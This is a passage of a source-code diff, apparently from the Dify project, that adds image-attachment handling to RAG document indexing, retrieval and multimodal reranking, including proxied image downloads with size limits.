+ """ + multi_model_documents: list[AttachmentDocument] = [] + text = document.page_content + images = self._extract_markdown_images(text) + if not images: + return multi_model_documents + upload_file_id_list = [] + + for image in images: + # Collect all upload_file_ids including duplicates to preserve occurrence count + + # For data before v0.10.0 + pattern = r"/files/([a-f0-9\-]+)/image-preview(?:\?.*?)?" + match = re.search(pattern, image) + if match: + upload_file_id = match.group(1) + upload_file_id_list.append(upload_file_id) + continue + + # For data after v0.10.0 + pattern = r"/files/([a-f0-9\-]+)/file-preview(?:\?.*?)?" + match = re.search(pattern, image) + if match: + upload_file_id = match.group(1) + upload_file_id_list.append(upload_file_id) + continue + + # For tools directory - direct file formats (e.g., .png, .jpg, etc.) + # Match URL including any query parameters up to common URL boundaries (space, parenthesis, quotes) + pattern = r"/files/tools/([a-f0-9\-]+)\.([a-zA-Z0-9]+)(?:\?[^\s\)\"\']*)?" + match = re.search(pattern, image) + if match: + if current_user: + tool_file_id = match.group(1) + upload_file_id = self._download_tool_file(tool_file_id, current_user) + if upload_file_id: + upload_file_id_list.append(upload_file_id) + continue + if current_user: + upload_file_id = self._download_image(image.split(" ")[0], current_user) + if upload_file_id: + upload_file_id_list.append(upload_file_id) + + if not upload_file_id_list: + return multi_model_documents + + # Get unique IDs for database query + unique_upload_file_ids = list(set(upload_file_id_list)) + upload_files = db.session.query(UploadFile).where(UploadFile.id.in_(unique_upload_file_ids)).all() + + # Create a mapping from ID to UploadFile for quick lookup + upload_file_map = {upload_file.id: upload_file for upload_file in upload_files} + + # Create a Document for each occurrence (including duplicates) + for upload_file_id in upload_file_id_list: + upload_file = upload_file_map.get(upload_file_id) + if upload_file: + multi_model_documents.append( + AttachmentDocument( + page_content=upload_file.name, + metadata={ + "doc_id": upload_file.id, + "doc_hash": "", + "document_id": document.metadata.get("document_id"), + "dataset_id": document.metadata.get("dataset_id"), + "doc_type": DocType.IMAGE, + }, + ) + ) + return multi_model_documents + + def _extract_markdown_images(self, text: str) -> list[str]: + """ + Extract the markdown images from the text. + """ + pattern = r"!\[.*?\]\((.*?)\)" + return re.findall(pattern, text) + + def _download_image(self, image_url: str, current_user: Account) -> str | None: + """ + Download the image from the URL. + Image size must not exceed 2MB. 
+ """ + from services.file_service import FileService + + MAX_IMAGE_SIZE = dify_config.ATTACHMENT_IMAGE_FILE_SIZE_LIMIT * 1024 * 1024 + DOWNLOAD_TIMEOUT = dify_config.ATTACHMENT_IMAGE_DOWNLOAD_TIMEOUT + + try: + # Download with timeout + response = ssrf_proxy.get(image_url, timeout=DOWNLOAD_TIMEOUT) + response.raise_for_status() + + # Check Content-Length header if available + content_length = response.headers.get("Content-Length") + if content_length and int(content_length) > MAX_IMAGE_SIZE: + logging.warning("Image from %s exceeds 2MB limit (size: %s bytes)", image_url, content_length) + return None + + filename = None + + content_disposition = response.headers.get("content-disposition") + if content_disposition: + _, params = cgi.parse_header(content_disposition) + if "filename" in params: + filename = params["filename"] + filename = unquote(filename) + + if not filename: + parsed_url = urlparse(image_url) + # unquote 处理 URL 中的中文 + path = unquote(parsed_url.path) + filename = os.path.basename(path) + + if not filename: + filename = "downloaded_image_file" + + name, current_ext = os.path.splitext(filename) + + content_type = response.headers.get("content-type", "").split(";")[0].strip() + + real_ext = mimetypes.guess_extension(content_type) + + if not current_ext and real_ext or current_ext in [".php", ".jsp", ".asp", ".html"] and real_ext: + filename = f"{name}{real_ext}" + # Download content with size limit + blob = b"" + for chunk in response.iter_bytes(chunk_size=8192): + blob += chunk + if len(blob) > MAX_IMAGE_SIZE: + logging.warning("Image from %s exceeds 2MB limit during download", image_url) + return None + + if not blob: + logging.warning("Image from %s is empty", image_url) + return None + + upload_file = FileService(db.engine).upload_file( + filename=filename, + content=blob, + mimetype=content_type, + user=current_user, + ) + return upload_file.id + except httpx.TimeoutException: + logging.warning("Timeout downloading image from %s after %s seconds", image_url, DOWNLOAD_TIMEOUT) + return None + except httpx.RequestError as e: + logging.warning("Error downloading image from %s: %s", image_url, str(e)) + return None + except Exception: + logging.exception("Unexpected error downloading image from %s", image_url) + return None + + def _download_tool_file(self, tool_file_id: str, current_user: Account) -> str | None: + """ + Download the tool file from the ID. 
+ """ + from services.file_service import FileService + + tool_file = db.session.query(ToolFile).where(ToolFile.id == tool_file_id).first() + if not tool_file: + return None + blob = storage.load_once(tool_file.file_key) + upload_file = FileService(db.engine).upload_file( + filename=tool_file.name, + content=blob, + mimetype=tool_file.mimetype, + user=current_user, + ) + return upload_file.id diff --git a/api/core/rag/index_processor/index_processor_factory.py b/api/core/rag/index_processor/index_processor_factory.py index c987edf342..ea6ab24699 100644 --- a/api/core/rag/index_processor/index_processor_factory.py +++ b/api/core/rag/index_processor/index_processor_factory.py @@ -1,6 +1,6 @@ """Abstract interface for document loader implementations.""" -from core.rag.index_processor.constant.index_type import IndexType +from core.rag.index_processor.constant.index_type import IndexStructureType from core.rag.index_processor.index_processor_base import BaseIndexProcessor from core.rag.index_processor.processor.paragraph_index_processor import ParagraphIndexProcessor from core.rag.index_processor.processor.parent_child_index_processor import ParentChildIndexProcessor @@ -19,11 +19,11 @@ class IndexProcessorFactory: if not self._index_type: raise ValueError("Index type must be specified.") - if self._index_type == IndexType.PARAGRAPH_INDEX: + if self._index_type == IndexStructureType.PARAGRAPH_INDEX: return ParagraphIndexProcessor() - elif self._index_type == IndexType.QA_INDEX: + elif self._index_type == IndexStructureType.QA_INDEX: return QAIndexProcessor() - elif self._index_type == IndexType.PARENT_CHILD_INDEX: + elif self._index_type == IndexStructureType.PARENT_CHILD_INDEX: return ParentChildIndexProcessor() else: raise ValueError(f"Index type {self._index_type} is not supported.") diff --git a/api/core/rag/index_processor/processor/paragraph_index_processor.py b/api/core/rag/index_processor/processor/paragraph_index_processor.py index 5e5fea7ea9..cf68cff7dc 100644 --- a/api/core/rag/index_processor/processor/paragraph_index_processor.py +++ b/api/core/rag/index_processor/processor/paragraph_index_processor.py @@ -11,14 +11,17 @@ from core.rag.datasource.vdb.vector_factory import Vector from core.rag.docstore.dataset_docstore import DatasetDocumentStore from core.rag.extractor.entity.extract_setting import ExtractSetting from core.rag.extractor.extract_processor import ExtractProcessor -from core.rag.index_processor.constant.index_type import IndexType +from core.rag.index_processor.constant.doc_type import DocType +from core.rag.index_processor.constant.index_type import IndexStructureType from core.rag.index_processor.index_processor_base import BaseIndexProcessor -from core.rag.models.document import Document +from core.rag.models.document import AttachmentDocument, Document, MultimodalGeneralStructureChunk from core.rag.retrieval.retrieval_methods import RetrievalMethod from core.tools.utils.text_processing_utils import remove_leading_symbols from libs import helper +from models.account import Account from models.dataset import Dataset, DatasetProcessRule from models.dataset import Document as DatasetDocument +from services.account_service import AccountService from services.entities.knowledge_entities.knowledge_entities import Rule @@ -33,7 +36,7 @@ class ParagraphIndexProcessor(BaseIndexProcessor): return text_docs - def transform(self, documents: list[Document], **kwargs) -> list[Document]: + def transform(self, documents: list[Document], current_user: Account | None = None, 
**kwargs) -> list[Document]: process_rule = kwargs.get("process_rule") if not process_rule: raise ValueError("No process rule found.") @@ -69,6 +72,11 @@ class ParagraphIndexProcessor(BaseIndexProcessor): if document_node.metadata is not None: document_node.metadata["doc_id"] = doc_id document_node.metadata["doc_hash"] = hash + multimodal_documents = ( + self._get_content_files(document_node, current_user) if document_node.metadata else None + ) + if multimodal_documents: + document_node.attachments = multimodal_documents # delete Splitter character page_content = remove_leading_symbols(document_node.page_content).strip() if len(page_content) > 0: @@ -77,10 +85,19 @@ class ParagraphIndexProcessor(BaseIndexProcessor): all_documents.extend(split_documents) return all_documents - def load(self, dataset: Dataset, documents: list[Document], with_keywords: bool = True, **kwargs): + def load( + self, + dataset: Dataset, + documents: list[Document], + multimodal_documents: list[AttachmentDocument] | None = None, + with_keywords: bool = True, + **kwargs, + ): if dataset.indexing_technique == "high_quality": vector = Vector(dataset) vector.create(documents) + if multimodal_documents and dataset.is_multimodal: + vector.create_multimodal(multimodal_documents) with_keywords = False if with_keywords: keywords_list = kwargs.get("keywords_list") @@ -134,8 +151,9 @@ class ParagraphIndexProcessor(BaseIndexProcessor): return docs def index(self, dataset: Dataset, document: DatasetDocument, chunks: Any): + documents: list[Any] = [] + all_multimodal_documents: list[Any] = [] if isinstance(chunks, list): - documents = [] for content in chunks: metadata = { "dataset_id": dataset.id, @@ -144,26 +162,68 @@ class ParagraphIndexProcessor(BaseIndexProcessor): "doc_hash": helper.generate_text_hash(content), } doc = Document(page_content=content, metadata=metadata) + attachments = self._get_content_files(doc) + if attachments: + doc.attachments = attachments + all_multimodal_documents.extend(attachments) documents.append(doc) - if documents: - # save node to document segment - doc_store = DatasetDocumentStore(dataset=dataset, user_id=document.created_by, document_id=document.id) - # add document segments - doc_store.add_documents(docs=documents, save_child=False) - if dataset.indexing_technique == "high_quality": - vector = Vector(dataset) - vector.create(documents) - elif dataset.indexing_technique == "economy": - keyword = Keyword(dataset) - keyword.add_texts(documents) else: - raise ValueError("Chunks is not a list") + multimodal_general_structure = MultimodalGeneralStructureChunk.model_validate(chunks) + for general_chunk in multimodal_general_structure.general_chunks: + metadata = { + "dataset_id": dataset.id, + "document_id": document.id, + "doc_id": str(uuid.uuid4()), + "doc_hash": helper.generate_text_hash(general_chunk.content), + } + doc = Document(page_content=general_chunk.content, metadata=metadata) + if general_chunk.files: + attachments = [] + for file in general_chunk.files: + file_metadata = { + "doc_id": file.id, + "doc_hash": "", + "document_id": document.id, + "dataset_id": dataset.id, + "doc_type": DocType.IMAGE, + } + file_document = AttachmentDocument( + page_content=file.filename or "image_file", metadata=file_metadata + ) + attachments.append(file_document) + all_multimodal_documents.append(file_document) + doc.attachments = attachments + else: + account = AccountService.load_user(document.created_by) + if not account: + raise ValueError("Invalid account") + doc.attachments = 
self._get_content_files(doc, current_user=account) + if doc.attachments: + all_multimodal_documents.extend(doc.attachments) + documents.append(doc) + if documents: + # save node to document segment + doc_store = DatasetDocumentStore(dataset=dataset, user_id=document.created_by, document_id=document.id) + # add document segments + doc_store.add_documents(docs=documents, save_child=False) + if dataset.indexing_technique == "high_quality": + vector = Vector(dataset) + vector.create(documents) + if all_multimodal_documents and dataset.is_multimodal: + vector.create_multimodal(all_multimodal_documents) + elif dataset.indexing_technique == "economy": + keyword = Keyword(dataset) + keyword.add_texts(documents) def format_preview(self, chunks: Any) -> Mapping[str, Any]: if isinstance(chunks, list): preview = [] for content in chunks: preview.append({"content": content}) - return {"chunk_structure": IndexType.PARAGRAPH_INDEX, "preview": preview, "total_segments": len(chunks)} + return { + "chunk_structure": IndexStructureType.PARAGRAPH_INDEX, + "preview": preview, + "total_segments": len(chunks), + } else: raise ValueError("Chunks is not a list") diff --git a/api/core/rag/index_processor/processor/parent_child_index_processor.py b/api/core/rag/index_processor/processor/parent_child_index_processor.py index 4fa78e2f95..0366f3259f 100644 --- a/api/core/rag/index_processor/processor/parent_child_index_processor.py +++ b/api/core/rag/index_processor/processor/parent_child_index_processor.py @@ -13,14 +13,17 @@ from core.rag.datasource.vdb.vector_factory import Vector from core.rag.docstore.dataset_docstore import DatasetDocumentStore from core.rag.extractor.entity.extract_setting import ExtractSetting from core.rag.extractor.extract_processor import ExtractProcessor -from core.rag.index_processor.constant.index_type import IndexType +from core.rag.index_processor.constant.doc_type import DocType +from core.rag.index_processor.constant.index_type import IndexStructureType from core.rag.index_processor.index_processor_base import BaseIndexProcessor -from core.rag.models.document import ChildDocument, Document, ParentChildStructureChunk +from core.rag.models.document import AttachmentDocument, ChildDocument, Document, ParentChildStructureChunk from core.rag.retrieval.retrieval_methods import RetrievalMethod from extensions.ext_database import db from libs import helper +from models import Account from models.dataset import ChildChunk, Dataset, DatasetProcessRule, DocumentSegment from models.dataset import Document as DatasetDocument +from services.account_service import AccountService from services.entities.knowledge_entities.knowledge_entities import ParentMode, Rule @@ -35,7 +38,7 @@ class ParentChildIndexProcessor(BaseIndexProcessor): return text_docs - def transform(self, documents: list[Document], **kwargs) -> list[Document]: + def transform(self, documents: list[Document], current_user: Account | None = None, **kwargs) -> list[Document]: process_rule = kwargs.get("process_rule") if not process_rule: raise ValueError("No process rule found.") @@ -77,6 +80,9 @@ class ParentChildIndexProcessor(BaseIndexProcessor): page_content = page_content if len(page_content) > 0: document_node.page_content = page_content + multimodel_documents = self._get_content_files(document_node, current_user) + if multimodel_documents: + document_node.attachments = multimodel_documents # parse document to child nodes child_nodes = self._split_child_nodes( document_node, rules, process_rule.get("mode"), 
kwargs.get("embedding_model_instance") @@ -87,6 +93,9 @@ class ParentChildIndexProcessor(BaseIndexProcessor): elif rules.parent_mode == ParentMode.FULL_DOC: page_content = "\n".join([document.page_content for document in documents]) document = Document(page_content=page_content, metadata=documents[0].metadata) + multimodel_documents = self._get_content_files(document) + if multimodel_documents: + document.attachments = multimodel_documents # parse document to child nodes child_nodes = self._split_child_nodes( document, rules, process_rule.get("mode"), kwargs.get("embedding_model_instance") @@ -104,7 +113,14 @@ class ParentChildIndexProcessor(BaseIndexProcessor): return all_documents - def load(self, dataset: Dataset, documents: list[Document], with_keywords: bool = True, **kwargs): + def load( + self, + dataset: Dataset, + documents: list[Document], + multimodal_documents: list[AttachmentDocument] | None = None, + with_keywords: bool = True, + **kwargs, + ): if dataset.indexing_technique == "high_quality": vector = Vector(dataset) for document in documents: @@ -114,6 +130,8 @@ class ParentChildIndexProcessor(BaseIndexProcessor): Document.model_validate(child_document.model_dump()) for child_document in child_documents ] vector.create(formatted_child_documents) + if multimodal_documents and dataset.is_multimodal: + vector.create_multimodal(multimodal_documents) def clean(self, dataset: Dataset, node_ids: list[str] | None, with_keywords: bool = True, **kwargs): # node_ids is segment's node_ids @@ -244,6 +262,24 @@ class ParentChildIndexProcessor(BaseIndexProcessor): } child_documents.append(ChildDocument(page_content=child, metadata=child_metadata)) doc = Document(page_content=parent_child.parent_content, metadata=metadata, children=child_documents) + if parent_child.files and len(parent_child.files) > 0: + attachments = [] + for file in parent_child.files: + file_metadata = { + "doc_id": file.id, + "doc_hash": "", + "document_id": document.id, + "dataset_id": dataset.id, + "doc_type": DocType.IMAGE, + } + file_document = AttachmentDocument(page_content=file.filename or "", metadata=file_metadata) + attachments.append(file_document) + doc.attachments = attachments + else: + account = AccountService.load_user(document.created_by) + if not account: + raise ValueError("Invalid account") + doc.attachments = self._get_content_files(doc, current_user=account) documents.append(doc) if documents: # update document parent mode @@ -267,12 +303,17 @@ class ParentChildIndexProcessor(BaseIndexProcessor): doc_store.add_documents(docs=documents, save_child=True) if dataset.indexing_technique == "high_quality": all_child_documents = [] + all_multimodal_documents = [] for doc in documents: if doc.children: all_child_documents.extend(doc.children) + if doc.attachments: + all_multimodal_documents.extend(doc.attachments) + vector = Vector(dataset) if all_child_documents: - vector = Vector(dataset) vector.create(all_child_documents) + if all_multimodal_documents and dataset.is_multimodal: + vector.create_multimodal(all_multimodal_documents) def format_preview(self, chunks: Any) -> Mapping[str, Any]: parent_childs = ParentChildStructureChunk.model_validate(chunks) @@ -280,7 +321,7 @@ class ParentChildIndexProcessor(BaseIndexProcessor): for parent_child in parent_childs.parent_child_chunks: preview.append({"content": parent_child.parent_content, "child_chunks": parent_child.child_contents}) return { - "chunk_structure": IndexType.PARENT_CHILD_INDEX, + "chunk_structure": IndexStructureType.PARENT_CHILD_INDEX, 
"parent_mode": parent_childs.parent_mode, "preview": preview, "total_segments": len(parent_childs.parent_child_chunks), diff --git a/api/core/rag/index_processor/processor/qa_index_processor.py b/api/core/rag/index_processor/processor/qa_index_processor.py index 3e3deb0180..1183d5fbd7 100644 --- a/api/core/rag/index_processor/processor/qa_index_processor.py +++ b/api/core/rag/index_processor/processor/qa_index_processor.py @@ -18,12 +18,13 @@ from core.rag.datasource.vdb.vector_factory import Vector from core.rag.docstore.dataset_docstore import DatasetDocumentStore from core.rag.extractor.entity.extract_setting import ExtractSetting from core.rag.extractor.extract_processor import ExtractProcessor -from core.rag.index_processor.constant.index_type import IndexType +from core.rag.index_processor.constant.index_type import IndexStructureType from core.rag.index_processor.index_processor_base import BaseIndexProcessor -from core.rag.models.document import Document, QAStructureChunk +from core.rag.models.document import AttachmentDocument, Document, QAStructureChunk from core.rag.retrieval.retrieval_methods import RetrievalMethod from core.tools.utils.text_processing_utils import remove_leading_symbols from libs import helper +from models.account import Account from models.dataset import Dataset from models.dataset import Document as DatasetDocument from services.entities.knowledge_entities.knowledge_entities import Rule @@ -41,7 +42,7 @@ class QAIndexProcessor(BaseIndexProcessor): ) return text_docs - def transform(self, documents: list[Document], **kwargs) -> list[Document]: + def transform(self, documents: list[Document], current_user: Account | None = None, **kwargs) -> list[Document]: preview = kwargs.get("preview") process_rule = kwargs.get("process_rule") if not process_rule: @@ -116,7 +117,7 @@ class QAIndexProcessor(BaseIndexProcessor): try: # Skip the first row - df = pd.read_csv(file) + df = pd.read_csv(file) # type: ignore text_docs = [] for _, row in df.iterrows(): data = Document(page_content=row.iloc[0], metadata={"answer": row.iloc[1]}) @@ -128,10 +129,19 @@ class QAIndexProcessor(BaseIndexProcessor): raise ValueError(str(e)) return text_docs - def load(self, dataset: Dataset, documents: list[Document], with_keywords: bool = True, **kwargs): + def load( + self, + dataset: Dataset, + documents: list[Document], + multimodal_documents: list[AttachmentDocument] | None = None, + with_keywords: bool = True, + **kwargs, + ): if dataset.indexing_technique == "high_quality": vector = Vector(dataset) vector.create(documents) + if multimodal_documents and dataset.is_multimodal: + vector.create_multimodal(multimodal_documents) def clean(self, dataset: Dataset, node_ids: list[str] | None, with_keywords: bool = True, **kwargs): vector = Vector(dataset) @@ -197,7 +207,7 @@ class QAIndexProcessor(BaseIndexProcessor): for qa_chunk in qa_chunks.qa_chunks: preview.append({"question": qa_chunk.question, "answer": qa_chunk.answer}) return { - "chunk_structure": IndexType.QA_INDEX, + "chunk_structure": IndexStructureType.QA_INDEX, "qa_preview": preview, "total_segments": len(qa_chunks.qa_chunks), } diff --git a/api/core/rag/models/document.py b/api/core/rag/models/document.py index 4bd7b1d62e..611fad9a18 100644 --- a/api/core/rag/models/document.py +++ b/api/core/rag/models/document.py @@ -4,6 +4,8 @@ from typing import Any from pydantic import BaseModel, Field +from core.file import File + class ChildDocument(BaseModel): """Class for storing a piece of text and associated metadata.""" @@ -15,7 
+17,19 @@ class ChildDocument(BaseModel): """Arbitrary metadata about the page content (e.g., source, relationships to other documents, etc.). """ - metadata: dict = Field(default_factory=dict) + metadata: dict[str, Any] = Field(default_factory=dict) + + +class AttachmentDocument(BaseModel): + """Class for storing a piece of text and associated metadata.""" + + page_content: str + + provider: str | None = "dify" + + vector: list[float] | None = None + + metadata: dict[str, Any] = Field(default_factory=dict) class Document(BaseModel): @@ -28,12 +42,31 @@ class Document(BaseModel): """Arbitrary metadata about the page content (e.g., source, relationships to other documents, etc.). """ - metadata: dict = Field(default_factory=dict) + metadata: dict[str, Any] = Field(default_factory=dict) provider: str | None = "dify" children: list[ChildDocument] | None = None + attachments: list[AttachmentDocument] | None = None + + +class GeneralChunk(BaseModel): + """ + General Chunk. + """ + + content: str + files: list[File] | None = None + + +class MultimodalGeneralStructureChunk(BaseModel): + """ + Multimodal General Structure Chunk. + """ + + general_chunks: list[GeneralChunk] + class GeneralStructureChunk(BaseModel): """ @@ -50,6 +83,7 @@ class ParentChildChunk(BaseModel): parent_content: str child_contents: list[str] + files: list[File] | None = None class ParentChildStructureChunk(BaseModel): diff --git a/api/core/rag/rerank/rerank_base.py b/api/core/rag/rerank/rerank_base.py index 3561def008..88acb75133 100644 --- a/api/core/rag/rerank/rerank_base.py +++ b/api/core/rag/rerank/rerank_base.py @@ -1,5 +1,6 @@ from abc import ABC, abstractmethod +from core.rag.index_processor.constant.query_type import QueryType from core.rag.models.document import Document @@ -12,6 +13,7 @@ class BaseRerankRunner(ABC): score_threshold: float | None = None, top_n: int | None = None, user: str | None = None, + query_type: QueryType = QueryType.TEXT_QUERY, ) -> list[Document]: """ Run rerank model diff --git a/api/core/rag/rerank/rerank_model.py b/api/core/rag/rerank/rerank_model.py index e855b0083f..38309d3d77 100644 --- a/api/core/rag/rerank/rerank_model.py +++ b/api/core/rag/rerank/rerank_model.py @@ -1,6 +1,15 @@ -from core.model_manager import ModelInstance +import base64 + +from core.model_manager import ModelInstance, ModelManager +from core.model_runtime.entities.model_entities import ModelType +from core.model_runtime.entities.rerank_entities import RerankResult +from core.rag.index_processor.constant.doc_type import DocType +from core.rag.index_processor.constant.query_type import QueryType from core.rag.models.document import Document from core.rag.rerank.rerank_base import BaseRerankRunner +from extensions.ext_database import db +from extensions.ext_storage import storage +from models.model import UploadFile class RerankModelRunner(BaseRerankRunner): @@ -14,6 +23,7 @@ class RerankModelRunner(BaseRerankRunner): score_threshold: float | None = None, top_n: int | None = None, user: str | None = None, + query_type: QueryType = QueryType.TEXT_QUERY, ) -> list[Document]: """ Run rerank model @@ -24,6 +34,56 @@ class RerankModelRunner(BaseRerankRunner): :param user: unique user id if needed :return: """ + model_manager = ModelManager() + is_support_vision = model_manager.check_model_support_vision( + tenant_id=self.rerank_model_instance.provider_model_bundle.configuration.tenant_id, + provider=self.rerank_model_instance.provider, + model=self.rerank_model_instance.model, + model_type=ModelType.RERANK, + ) + if not 
is_support_vision: + if query_type == QueryType.TEXT_QUERY: + rerank_result, unique_documents = self.fetch_text_rerank(query, documents, score_threshold, top_n, user) + else: + return documents + else: + rerank_result, unique_documents = self.fetch_multimodal_rerank( + query, documents, score_threshold, top_n, user, query_type + ) + + rerank_documents = [] + for result in rerank_result.docs: + if score_threshold is None or result.score >= score_threshold: + # format document + rerank_document = Document( + page_content=result.text, + metadata=unique_documents[result.index].metadata, + provider=unique_documents[result.index].provider, + ) + if rerank_document.metadata is not None: + rerank_document.metadata["score"] = result.score + rerank_documents.append(rerank_document) + + rerank_documents.sort(key=lambda x: x.metadata.get("score", 0.0), reverse=True) + return rerank_documents[:top_n] if top_n else rerank_documents + + def fetch_text_rerank( + self, + query: str, + documents: list[Document], + score_threshold: float | None = None, + top_n: int | None = None, + user: str | None = None, + ) -> tuple[RerankResult, list[Document]]: + """ + Fetch text rerank + :param query: search query + :param documents: documents for reranking + :param score_threshold: score threshold + :param top_n: top n + :param user: unique user id if needed + :return: + """ docs = [] doc_ids = set() unique_documents = [] @@ -33,33 +93,99 @@ class RerankModelRunner(BaseRerankRunner): and document.metadata is not None and document.metadata["doc_id"] not in doc_ids ): - doc_ids.add(document.metadata["doc_id"]) - docs.append(document.page_content) - unique_documents.append(document) + if not document.metadata.get("doc_type") or document.metadata.get("doc_type") == DocType.TEXT: + doc_ids.add(document.metadata["doc_id"]) + docs.append(document.page_content) + unique_documents.append(document) elif document.provider == "external": if document not in unique_documents: docs.append(document.page_content) unique_documents.append(document) - documents = unique_documents - rerank_result = self.rerank_model_instance.invoke_rerank( query=query, docs=docs, score_threshold=score_threshold, top_n=top_n, user=user ) + return rerank_result, unique_documents - rerank_documents = [] + def fetch_multimodal_rerank( + self, + query: str, + documents: list[Document], + score_threshold: float | None = None, + top_n: int | None = None, + user: str | None = None, + query_type: QueryType = QueryType.TEXT_QUERY, + ) -> tuple[RerankResult, list[Document]]: + """ + Fetch multimodal rerank + :param query: search query + :param documents: documents for reranking + :param score_threshold: score threshold + :param top_n: top n + :param user: unique user id if needed + :param query_type: query type + :return: rerank result + """ + docs = [] + doc_ids = set() + unique_documents = [] + for document in documents: + if ( + document.provider == "dify" + and document.metadata is not None + and document.metadata["doc_id"] not in doc_ids + ): + if document.metadata.get("doc_type") == DocType.IMAGE: + # Query file info within db.session context to ensure thread-safe access + upload_file = ( + db.session.query(UploadFile).where(UploadFile.id == document.metadata["doc_id"]).first() + ) + if upload_file: + blob = storage.load_once(upload_file.key) + document_file_base64 = base64.b64encode(blob).decode() + document_file_dict = { + "content": document_file_base64, + "content_type": document.metadata["doc_type"], + } + docs.append(document_file_dict) + else: + 
document_text_dict = { + "content": document.page_content, + "content_type": document.metadata.get("doc_type") or DocType.TEXT, + } + docs.append(document_text_dict) + doc_ids.add(document.metadata["doc_id"]) + unique_documents.append(document) + elif document.provider == "external": + if document not in unique_documents: + docs.append( + { + "content": document.page_content, + "content_type": document.metadata.get("doc_type") or DocType.TEXT, + } + ) + unique_documents.append(document) - for result in rerank_result.docs: - if score_threshold is None or result.score >= score_threshold: - # format document - rerank_document = Document( - page_content=result.text, - metadata=documents[result.index].metadata, - provider=documents[result.index].provider, + documents = unique_documents + if query_type == QueryType.TEXT_QUERY: + rerank_result, unique_documents = self.fetch_text_rerank(query, documents, score_threshold, top_n, user) + return rerank_result, unique_documents + elif query_type == QueryType.IMAGE_QUERY: + # Query file info within db.session context to ensure thread-safe access + upload_file = db.session.query(UploadFile).where(UploadFile.id == query).first() + if upload_file: + blob = storage.load_once(upload_file.key) + file_query = base64.b64encode(blob).decode() + file_query_dict = { + "content": file_query, + "content_type": DocType.IMAGE, + } + rerank_result = self.rerank_model_instance.invoke_multimodal_rerank( + query=file_query_dict, docs=docs, score_threshold=score_threshold, top_n=top_n, user=user ) - if rerank_document.metadata is not None: - rerank_document.metadata["score"] = result.score - rerank_documents.append(rerank_document) + return rerank_result, unique_documents + else: + raise ValueError(f"Upload file not found for query: {query}") - rerank_documents.sort(key=lambda x: x.metadata.get("score", 0.0), reverse=True) - return rerank_documents[:top_n] if top_n else rerank_documents + else: + raise ValueError(f"Query type {query_type} is not supported") diff --git a/api/core/rag/rerank/weight_rerank.py b/api/core/rag/rerank/weight_rerank.py index c455db6095..18020608cb 100644 --- a/api/core/rag/rerank/weight_rerank.py +++ b/api/core/rag/rerank/weight_rerank.py @@ -7,6 +7,8 @@ from core.model_manager import ModelManager from core.model_runtime.entities.model_entities import ModelType from core.rag.datasource.keyword.jieba.jieba_keyword_table_handler import JiebaKeywordTableHandler from core.rag.embedding.cached_embedding import CacheEmbedding +from core.rag.index_processor.constant.doc_type import DocType +from core.rag.index_processor.constant.query_type import QueryType from core.rag.models.document import Document from core.rag.rerank.entity.weight import VectorSetting, Weights from core.rag.rerank.rerank_base import BaseRerankRunner @@ -24,6 +26,7 @@ class WeightRerankRunner(BaseRerankRunner): score_threshold: float | None = None, top_n: int | None = None, user: str | None = None, + query_type: QueryType = QueryType.TEXT_QUERY, ) -> list[Document]: """ Run rerank model @@ -43,8 +46,10 @@ class WeightRerankRunner(BaseRerankRunner): and document.metadata is not None and document.metadata["doc_id"] not in doc_ids ): - doc_ids.add(document.metadata["doc_id"]) - unique_documents.append(document) + # weight rerank only support text documents + if not document.metadata.get("doc_type") or document.metadata.get("doc_type") == DocType.TEXT: + doc_ids.add(document.metadata["doc_id"]) + unique_documents.append(document) else: if document not in unique_documents: 
unique_documents.append(document) diff --git a/api/core/rag/retrieval/dataset_retrieval.py b/api/core/rag/retrieval/dataset_retrieval.py index 3db67efb0e..635eab73f0 100644 --- a/api/core/rag/retrieval/dataset_retrieval.py +++ b/api/core/rag/retrieval/dataset_retrieval.py @@ -8,6 +8,7 @@ from typing import Any, Union, cast from flask import Flask, current_app from sqlalchemy import and_, or_, select +from sqlalchemy.orm import Session from core.app.app_config.entities import ( DatasetEntity, @@ -19,6 +20,7 @@ from core.app.entities.app_invoke_entities import InvokeFrom, ModelConfigWithCre from core.callback_handler.index_tool_callback_handler import DatasetIndexToolCallbackHandler from core.entities.agent_entities import PlanningStrategy from core.entities.model_entities import ModelStatus +from core.file import File, FileTransferMethod, FileType from core.memory.token_buffer_memory import TokenBufferMemory from core.model_manager import ModelInstance, ModelManager from core.model_runtime.entities.llm_entities import LLMResult, LLMUsage @@ -37,7 +39,9 @@ from core.rag.datasource.retrieval_service import RetrievalService from core.rag.entities.citation_metadata import RetrievalSourceMetadata from core.rag.entities.context_entities import DocumentContext from core.rag.entities.metadata_entities import Condition, MetadataCondition -from core.rag.index_processor.constant.index_type import IndexType +from core.rag.index_processor.constant.doc_type import DocType +from core.rag.index_processor.constant.index_type import IndexStructureType, IndexTechniqueType +from core.rag.index_processor.constant.query_type import QueryType from core.rag.models.document import Document from core.rag.rerank.rerank_type import RerankMode from core.rag.retrieval.retrieval_methods import RetrievalMethod @@ -52,10 +56,12 @@ from core.rag.retrieval.template_prompts import ( METADATA_FILTER_USER_PROMPT_2, METADATA_FILTER_USER_PROMPT_3, ) +from core.tools.signature import sign_upload_file from core.tools.utils.dataset_retriever.dataset_retriever_base_tool import DatasetRetrieverBaseTool from extensions.ext_database import db from libs.json_in_md_parser import parse_and_check_json_markdown -from models.dataset import ChildChunk, Dataset, DatasetMetadata, DatasetQuery, DocumentSegment +from models import UploadFile +from models.dataset import ChildChunk, Dataset, DatasetMetadata, DatasetQuery, DocumentSegment, SegmentAttachmentBinding from models.dataset import Document as DatasetDocument from services.external_knowledge_service import ExternalDatasetService @@ -99,7 +105,8 @@ class DatasetRetrieval: message_id: str, memory: TokenBufferMemory | None = None, inputs: Mapping[str, Any] | None = None, - ) -> str | None: + vision_enabled: bool = False, + ) -> tuple[str | None, list[File] | None]: """ Retrieve dataset. 
